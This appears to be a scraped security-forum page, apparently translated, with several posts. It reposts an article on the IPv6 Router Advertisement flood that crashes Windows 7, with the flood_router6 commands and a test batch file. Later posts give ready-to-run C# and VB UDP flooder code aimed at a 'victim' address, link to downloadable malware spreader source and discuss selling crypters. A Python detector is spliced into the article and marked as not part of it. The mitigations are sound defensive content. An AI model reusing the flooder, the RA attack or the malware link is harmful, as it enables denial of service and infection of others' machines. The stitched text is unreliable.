- Excellent advisory from Marc Heuse* with complete disclosure timeline: http://www.mh-sec.de/downloads/mh-RA_flooding_CVE-2010-multiple.txt
- Multiple Vendors IPv6 Neighbor Discovery Router Advertisement Remote Denial of Service Vulnerability
- CVE-2010-4669 - Router Advertisements Cause DoS in Windows: National Vulnerability Database (NVD) (CVE-2010-4669)

Mitigation

There is no patch from Microsoft. But there are four ways I know of to protect your computers:

- Disable IPv6. This is drastic, and will break services you may want, such as HomeGroups and DirectAccess. But it will protect you.
- Turn off Router Discovery -- this is a simple solution, requiring only one command, but it will prevent you from using Stateless Autoconfiguration. It's probably appropriate for servers, but not as good for client machines. Details are shown below.
- Use a firewall to block rogue Router Advertisements, while still allowing them from your authorized gateway. This is the most precise solution, but it is easily defeated. Details are shown below.
- Get a switch with RA Guard -- details here: IPv6 Security Part 2, RA Guard – Let’s get practical - Insinuator

Added 5-30-2011: Marc Heuse has demonstrated some techniques to evade RA Guard with packet fragmentation:

- Bypassing Cisco's ICMPv6 Router Advertisement Guard feature: http://www.networksecurityarchive.org/html/FullDisclosure/2011-05/msg00446.html
- Packet captures of RA Guard Evasion in action: Yet another update on IPv6 security – Some notes from the IPv6-Kongress in Frankfurt - Insinuator

Turning Off Router Discovery

I recommend turning off Router Discovery on all servers and any other machines that do not need "Stateless Autoconfiguration" (automatically configured IPv6 addresses), with this command (execute it from an Administrator Command Prompt):

    netsh interface ipv6 set interface "Local Area Connection" routerdiscovery=disabled

I found that solution here: IPv6: stateless autoconfiguration / manual configuration

Blocking Rogue Router Advertisements with Windows Firewall

This method allows you to use Stateless Autoconfiguration from your authorized gateways, but block dumb rogues. However, a smart rogue could just sniff your Router Advertisement packets and spoof the authorized source address, to bypass the firewall rule. So this is a weak defense.

To do this, open "Windows Firewall with Advanced Security" and double-click the "Core Networking - Router Advertisement (ICMPv6-In)" rule, as shown below on this page:

In the Properties sheet, on the Scope tab, in the "Remote IP address" section, the IP address starts at fe80::/64, which allows any host on the LAN to send Router Advertisements. Edit this to a more specific address which matches your authorized servers, as shown below on this page:

The Attack

    cd /pentest/spoofing/thc-ipv6
    ./flood_router6 eth0
    Ctrl+C

Result

Any Win 7 machine on the same LAN is dead instantly, as all its resources are consumed joining thousands of fake IPv6 networks. To see the effect, cancel the attack very rapidly with Ctrl+C. Then with IPCONFIG you can see the effect on the target.

Batch File to Test for Vulnerability

On a Windows machine, run this batch file. Then run IFCONFIG on the other machines in your network. If they are vulnerable, they will show IPv6 addresses starting with dead:, as shown in the figure under the code.

    ECHO TESTING YOUR NETWORK FOR IPv6 ROUTER ADVERTISEMENT VULNERABILITY
    @ECHO OFF
    netsh int ipv6 set addr "Local Area Connection" dead:1::1/64
    netsh interface ipv6 set interface "Local Area Connection" routerdiscovery=enabled
    netsh int ipv6 add route dead:407::/64 "Local Area Connection" siteprefixlength=64 publish=yes
    ping 127.0.0.1 -n 3 -w 1000
    netsh int ipv6 del route dead:407::/64 "Local Area Connection"
    ECHO SENDING ADVERTISEMENT #1 OF 3
    netsh int ipv6 add route dead:408::/64 "Local Area Connection" siteprefixlength=64 publish=yes
    ping 127.0.0.1 -n 3 -w 1000
    netsh int ipv6 del route dead:408::/64 "Local Area Connection"
    ECHO SENDING ADVERTISEMENT #2 OF 3
    netsh int ipv6 add route dead:409::/64 "Local Area Connection" siteprefixlength=64 publish=yes
    ping 127.0.0.1 -n 3 -w 1000
    netsh int ipv6 del route dead:409::/64 "Local Area Connection"
    ECHO SENDING ADVERTISEMENT #3 OF 3
    ECHO RUN IPCONFIG ON EACH MACHINE AND LOOK FOR ADDRESSES STARTING dead::

The result on a vulnerable machine:

Class Projects

Here are some projects designed for use in schools and demonstrations:

- Win 7 DoS by RA Packets: Project 8x: Win 7 DoS by RA Packets (20 pts.) -- a slower, controllable version of the attack allows you to see just how many packets are required to stop a Windows machine.
- Router Advertisements with scapy: Project 9x: Router Advertisements with scapy (20 pts.) -- with scapy, you can craft packets easily so you can try variations of the attack.
- How to perform the attack from Windows using npg: Project 11x: Rogue RA Attack with npg on Windows (10 pts.)

FreeBSD is Vulnerable Too

At the Layer One security conference, on May 28, 2011, Justin Hohner tested a FreeBSD machine and told me it was vulnerable the same way. So we set up a VM and tried it there, with the results shown below:

The full-speed flood_router6 attack froze the FreeBSD machine so it was almost impossible to use, just like a Windows machine. So I slowed the attack down to approximately 100 RAs per second to capture this image:

100 RAs per second raised the CPU to 19.9% in my test. I filed a bug report. kern/157410: [ip6] IPv6 Router Advertisements Cause Excessive CPU Use

We tested OpenBSD and it was not vulnerable: it just ignores all RAs after the first ten or so, the same way Ubuntu Linux and Mac OS X do.

I just noticed that Marc Heuse already announced that BSD was vulnerable here http://www.mh-sec.de/downloads/mh-RA_flooding_CVE-2010-multiple.txt so that is not a new discovery. (5-30-2011)

Windows 8 Developer Preview is Vulnerable Too

This video was made by Josival Junior--good work!

Written by Sam Bowne; last modified 12 pm May 30, 2011
* On April 6 I mistakenly attributed Marc Heuse's advisory to Cisco. I fixed that error at 12:30 am April 7, 2011.
6-17-11: Fixed anchor tag error
9-15-2011: Added Win 8 Developer Preview video

I hope you learn something from this and don't believe that IPv6 is more secure than IPv4 and will revolutionize the world; as the article says, companies like Microsoft don't intend to do anything about this, and what's more they say this vulnerability has existed for months.

Source: Win 7 DoS by RA Packets
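A detection-side view of the Router Advertisement flood described in this post, as an added example that is not part of the post or of Sam Bowne's page: it parses RA message bodies (RFC 4861 layout) and alerts when more than ten distinct prefixes appear within one second. It counts prefixes rather than source addresses because the post notes that the source can be spoofed; the threshold, window, names and sample packets are assumptions constructed for illustration.

```python
import ipaddress
import struct
from collections import deque

ICMPV6_RA = 134        # ICMPv6 type: Router Advertisement (RFC 4861)
OPT_PREFIX_INFO = 3    # Neighbor Discovery option: Prefix Information


def build_ra(prefix, prefix_len=64):
    """Build a constructed RA body with one Prefix Information option (sample input)."""
    # type, code, checksum, hop limit, flags, router lifetime, reachable, retrans
    header = struct.pack("!BBHBBHII", ICMPV6_RA, 0, 0, 64, 0, 1800, 0, 0)
    # type, length (8-byte units), prefix length, L/A flags, valid, preferred, reserved
    option = struct.pack("!BBBBIII", OPT_PREFIX_INFO, 4, prefix_len, 0xC0, 86400, 14400, 0)
    return header + option + ipaddress.IPv6Address(prefix).packed


def parse_ra_prefixes(msg):
    """Return the prefixes advertised in an RA body, or None if msg is not an RA."""
    if len(msg) < 16 or msg[0] != ICMPV6_RA:
        return None
    prefixes, off = [], 16
    while off + 2 <= len(msg):
        opt_type, opt_len = msg[off], msg[off + 1] * 8
        if opt_len == 0 or off + opt_len > len(msg):
            break  # malformed or truncated option: stop parsing
        if opt_type == OPT_PREFIX_INFO and opt_len == 32 and msg[off + 2] <= 128:
            addr = ipaddress.IPv6Address(msg[off + 16:off + 32])
            prefixes.append(ipaddress.IPv6Network((addr, msg[off + 2]), strict=False))
        off += opt_len
    return prefixes


class RAFloodDetector:
    """Alert when too many distinct prefixes are advertised inside a sliding window."""

    def __init__(self, window=1.0, max_prefixes=10):
        self.window, self.max_prefixes = window, max_prefixes
        self.active = set()     # prefixes first seen inside the current window
        self.recent = deque()   # (timestamp, prefix) in arrival order

    def observe(self, ts, msg):
        prefixes = parse_ra_prefixes(msg)
        if prefixes is None:
            return False
        # Expire sightings that have fallen out of the window.
        while self.recent and ts - self.recent[0][0] > self.window:
            self.active.discard(self.recent.popleft()[1])
        for p in prefixes:
            if p not in self.active:
                self.active.add(p)
                self.recent.append((ts, p))
        return len(self.active) > self.max_prefixes


def demo():
    det = RAFloodDetector()
    # Constructed normal traffic: one router repeating the same prefix every 0.2 s.
    normal = [det.observe(t * 0.2, build_ra("2001:db8:1::")) for t in range(20)]
    # Constructed flood: 100 RAs in one second, each advertising a different prefix.
    flood = [det.observe(10 + i * 0.01, build_ra(f"2001:db8:{i + 2:x}::"))
             for i in range(100)]
    return any(normal), flood.index(True)


if __name__ == "__main__":
    print(demo())
```

In a real deployment the message bytes would come from a capture on the LAN segment; the detector only needs the ICMPv6 body and an arrival timestamp.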
  14. For years, on security forums and mailing lists, if you ever dared to suggest changing SSH’s default port (TCP 22) the “security by obscurity” crowd would come out of the woodwork and nail your ass to the Cross of Righteousness for having the unmitigated gall to even dare utter such heretical nonsense.

Unfortunately for these dogmatic True Believers, changing the ssh daemon’s default listening port is such an incredibly effective method for avoiding ssh scans and brute force password attacks that it’s starting to show up in HOWTO security articles as a method for hardening your system. For example, see this article at Linux Magazine: Five Easy Ways to Secure Your Linux System | Linux Magazine

But the Port 22 Crowd will not leave well enough alone. Although they haven’t abandoned the “security by obscurity” mantra completely, they’re now using the following argument with increasing frequency:

NEVER CHANGE YOUR SSH PORT! If an exploit comes out that can crash SSH locally, a local unprivileged user on your system could crash SSH and start their own daemon on the SSH port > 1024 and capture your usernames and passwords. If you want SSH on a different port, do this with firewall rules.

Note that ALL CAPS is required when raising this alarm. Also note that if you require users to connect with SSH in the first place, it’s not going to do them a helluva lot of good to crash SSH. If you have users who actually sit down at the keyboard of the physical system, that’s another problem entirely. Why bother with crashing SSH when they can slip a bootable CD into the tray and bounce the box? And of course if you choose a port other than 22 but less than 1024 you can avoid this issue completely.

However, “changing the port with firewall rules” struck me as a novel idea (maybe I’m just stupid but it never occurred to me before) and set me to wondering how you would do such a thing, since I’ve always taken the easy way out by changing or adding ports in sshd_config. So I sat down with iptables and experimented a bit. I came up with the following method.

If everything you have is behind NAT, the problem can be reduced to simple port forwarding. If not, there are a few hoops you need to jump through. Be advised the iptables rules presented below assume you have a blank set of rules. Just copying and running them against an existing set of rules probably won’t work.

First, set SSHD back to the default port 22. Next, figure out what port or ports you want to do SSH over. We’re going to use 99, 88, and 8888 here.

Now we take care of the Hypothetical Evil Unprivileged User by not accepting anything over those ports in the first place. This is only effective for port 8888 but we’ll do all three ports for the sake of completeness:

    iptables -t filter -A INPUT -p tcp -m multiport --dports 99,88,8888 -j REJECT --reject-with tcp-reset

Then, pick a number between 1 and 4294967295. This will be the value of the iptables “mark” we use for ssh. I’ll use 0x29A (666), just because it’s my lucky number, but any positive integer in that range will do. We’re going to tell iptables to reject anything without this mark coming into port 22.

    iptables -t filter -A INPUT -p tcp -m tcp --dport 22 -m connmark ! --mark 0x29A -j REJECT --reject-with tcp-reset

I would prefer to DROP these packets rather than REJECT them, but more on that later. Now we’ll tell iptables what ports we will accept for ssh.

    iptables -t filter -A FORWARD -p tcp -m multiport --dports 99,88,8888 -j ACCEPT

In the “mangle” table we slap our mark on these packets.

    iptables -t mangle -A PREROUTING -p tcp -m multiport --dports 99,88,8888 -j CONNMARK --set-mark 0x29A

Finally, in the “nat” table we tell iptables to send the marked packets back to port 22.

    iptables -t nat -A PREROUTING -p tcp -m multiport --dports 99,88,8888 -j REDIRECT --to-ports 22

The packets go back to the INPUT rule and, since they’re marked correctly, are sent to the SSHD process listening on port 22. We have done exactly what was recommended, i.e. we have indeed changed the default ssh port with firewall rules alone (and without NAT). And yet, ssh still listens on port 22!

I must admit this appeals to me on a number of levels, not the least of which is that it has all the hallmarks of a slick little hack. Secondly, it definitely takes a load off of the ssh daemon since it’s listening on one port instead of three (in reality I have ssh listening on seven ports).

However, this is done at the expense of complexity, which has yet another group of True Believers who are fond of chanting “COMPLEXITY IS THE ENEMY OF SECURITY” at the slightest provocation. This is another religion I have never bought into (it may be the same group since increasing complexity generally tends to increase obscurity). Well, fuck them, you can’t please everyone. Besides, I use the most bizarre, complex combination of port forwarding and routing you’d ever want to see. Most days I have a hard time understanding it myself. It keeps me sharp.

I am almost 100% certain this wouldn’t please a “real” firewall administrator. They’re mostly overpaid Certified Cisco Clowns anyway. It would never even occur to them to actually use iptables.

But what we have done in essence is put all our trust in iptables working “just right”. And we’re betting the next time there’s an update to the netfilter core code (or the kernel) everything will still work. I’ve been around iptables/netfilter far too long to ever bet on that. Sorry, fellas, “once bitten, twice shy” and all that.

Then there’s the TCP reset thing. Can it be bypassed? Web filtering appliances that use span ports and two-way TCP resets work fine when everyone “plays by the rules of TCP/IP” (actual statement from Web filter appliance vendor Sophos), but the Bad Guys don’t usually play by the rules. The alternative, DROP-ing the packet, lets anyone scanning our system with tools like nmap know with absolute certainty that SSHD is listening on port 22 since it will show up as “filtered”. This makes TCP resets the lesser of two evils, but it’s still evil. In the end analysis, isn’t sending a reset from an “open” port just another instance of “security by obscurity”? Not that I care, that was a purely rhetorical question.

And what about attacks against iptables connection marking (CONNMARK) itself? Do they even exist? Am I opening myself up to an unknown exploit vector? Do I have to take additional measures to avoid spoofing or brute forcing or some other method (fragmented/crafted packets, maybe) to get around my firewall rules?

Even though we followed this fellow’s advice, there are too many open questions and it appears that just changing the port in sshd_config is still a simple and effective countermeasure. It’s worked for me for over ten years. I have escaped all 0day SSHD vulnerabilities for over a decade and no one ever tries to brute force passwords on my box. It doesn’t happen because port 22 isn’t open. Simple. Effective.
  15. I hope Yahoo and live.com take a stand and stop allowing them on IM; damn it, what don't they already have?
  16. Are you sure that's the password? Edit: I'm just dumber than usual today....
  17. If I hadn't looked at how old the topic is, I wouldn't have realized how stupid this is...

C#:

    int i = 0;
    public static string IP;
    public static int Port;

    private void Bg_DoWork(System.Object sender, System.ComponentModel.DoWorkEventArgs e)
    {
        IPAddress IpVictima = IPAddress.Parse(IP);
        IPEndPoint Victima = new IPEndPoint(IpVictima, Port);
        byte[] packet = new byte[1470];
        Socket socket = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
        while (true)
        {
            if (Bg.CancellationPending == true)
            {
                return;
            }
            try
            {
                socket.SendTo(packet, Victima);
                i += 1;
            }
            catch (Exception ex)
            {
                Bg.CancelAsync();
            }
        }
    }

Usage: Bg.RunWorkerAsync();, respectively Bg.CancelAsync();

VB:

    Dim i As Integer = 0
    Public Shared IP As String
    Public Shared Port As Integer

    Private Sub Bg_DoWork(ByVal sender As System.Object, ByVal e As System.ComponentModel.DoWorkEventArgs) Handles Bg2.DoWork
        Dim IpVictima As IPAddress = IPAddress.Parse(IP)
        Dim Victima As New IPEndPoint(IpVictima, Port)
        Dim packet As Byte() = New Byte(1469) {}
        Dim socket As New Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp)
        While True
            If Bg.CancellationPending = True Then
                Exit Sub
            End If
            Try
                socket.SendTo(packet, Victima)
                i += 1
            Catch ex As Exception
                Bg.CancelAsync()
            End Try
        End While
    End Sub

Usage: Bg.RunWorkerAsync(), respectively Bg.CancelAsync()

How hard is it to make one yourselves?
  18. You know Windows about as well as you know Linux or, for that matter, Diablo 3. Vista with WPF will, in my opinion, remain the most stable OS for WPF... of course you have no idea what that is. Vienna, of course because of many so-called errors, all the fault of programmers who stayed on the XP CLR and did not notice the power of WPF... so they released an OS to please ordinary people too... like you + Silverlight. Win8 Metro style, Async... naturally you have no idea what that means. If I ask you roughly how many new functions there are in the new kernel... of course you can't answer, but if I ask it about the Linux platform it's about the same, I don't know what to say... that's because you haven't taken a look at Microsoft in this case... Channel9, MSDN, blogs. Visual Studio10+=WPF, just to give you an idea.

Some say XP always will be and will remain... well, they are right, but only from 2 points of view... namely programming and hardware. Windows 8 is made to run on almost any PC, but Windows 8 is structured in such a way that any program you add increases the efficiency of the operating system... something new; until now you heard of programs that weigh down your OS... and most of them do what you also find in Microsoft's utilities... but now this is changing, though that doesn't mean the requirements won't grow as you install crap.

A tip for those with VMs: Win 8 requires at least 512 MB of extra memory when it comes to a VM... so that may also be why it doesn't work for you... in this version there is a problem with drivers... in general about 90% of the ones that work on Win7 also work on 8, and if they don't work... install them manually, same with the ones for XP.

There's a lot to say about Win8; well, I don't know how interesting you'll find it... but it's a pretty OK OS, I'd say. Welcome Async, Metro Style.><
  19. https://rstcenter.com/forum/47292-poze-cu-carcasa-p-4.rst#post314826
  20. Man, you guys are really confused.... honestly, I argued with bunnn, I don't know if you still remember... honestly I don't like that crypter, I'd rather make my own if I really feel the need for something like that, BUT, bro, you don't set up a crypt service like this with open source without posting the source, or rather you don't build a service like this from other people's work, public work at that, and make money from it too. Make your own, bro, keep it updated so you know you'll have customers, and sell your services. Not to mention that the website is a mess, as B3st also discovered; you are either envious because you aren't capable of making a lousy crypter for your own pleasure, or you're blind. In my opinion, they are weak... they have no clue; honestly, if Bunn found out that I was selling his services, like the link above, it would turn out badly from several points of view... don't you think? No offense.
  21. AutoSpreader Source: http://www.opensc.ws/attachments/malware-samples-information/5391d1310954922-dev-point-spreader-v2-0-dev-point_spreader_v2.0-source-code.rar The fucking spreader. B3st: I don't think they're accepted, anyway I spilled Cola on my keyboard :))
  22. Actually I think that if Microsoft stops being "user friendly", Linux will disappear; the thing is that pyth0n3 was right and it needs some thought. If you ever ask a question like this on RST, Linux will win... because it is "blasphemy" for it not to win... it's psychological, some bug with 150 posts saying "fuck Microsoft" without thinking about much... such as free expression (or what Windows is and what you do with it, or Linux, by his own definition). To be honest, a programming language such as ASM or C/C++ will always be the same, and if you know them at all you don't give a fuck what operating system you use.

I think the answer to the topic title is rather... I don't give a fuck, I get by with either one... programming is the same shit everywhere, administration too, differing very little because of the OS.

As for gaming... well, as long as Microsoft doesn't bring even the smallest part of DirectX to Linux/Mac, it's only normal that it holds the monopoly.

AND yes, there have been many; I even witnessed a few Linux vs Windows discussions, but honestly it seems like crap to me, nonsense. I have come to the conclusion that you can do pretty much anything on Linux, you can even run some Windows applications, .NET, etc., but likewise on Windows you can run Linux applications and do a lot more; to be honest, I used Wine about 2 times, and it seems like crap to me the fact that so many people at About, who were not able to run some drivers or system files, otherwise everything is fine, I like it, but NO.

If you ever consider yourself a programmer, don't answer with Linux... or Windows; a programmer with some 10-15 years of experience picks up a new programming language in at most 1 month, without caring much about the OS.

AND I stand by my opinion: an ordinary user, if you tell him the whole RST novel about Linux and what it does... believe me, he answers either "Does it have Counter?"... "Does it have Facebook?"... and if you tell them yes... "no bro, leave it, Windows... because..." which Linux has too...? A new user who already has one OS imprinted in his head will care very little about another.

It's good to have an operating system in your head, and especially what each one does, but each one can do anything, so my conclusion: the OS doesn't matter, the person in front of the monitor matters.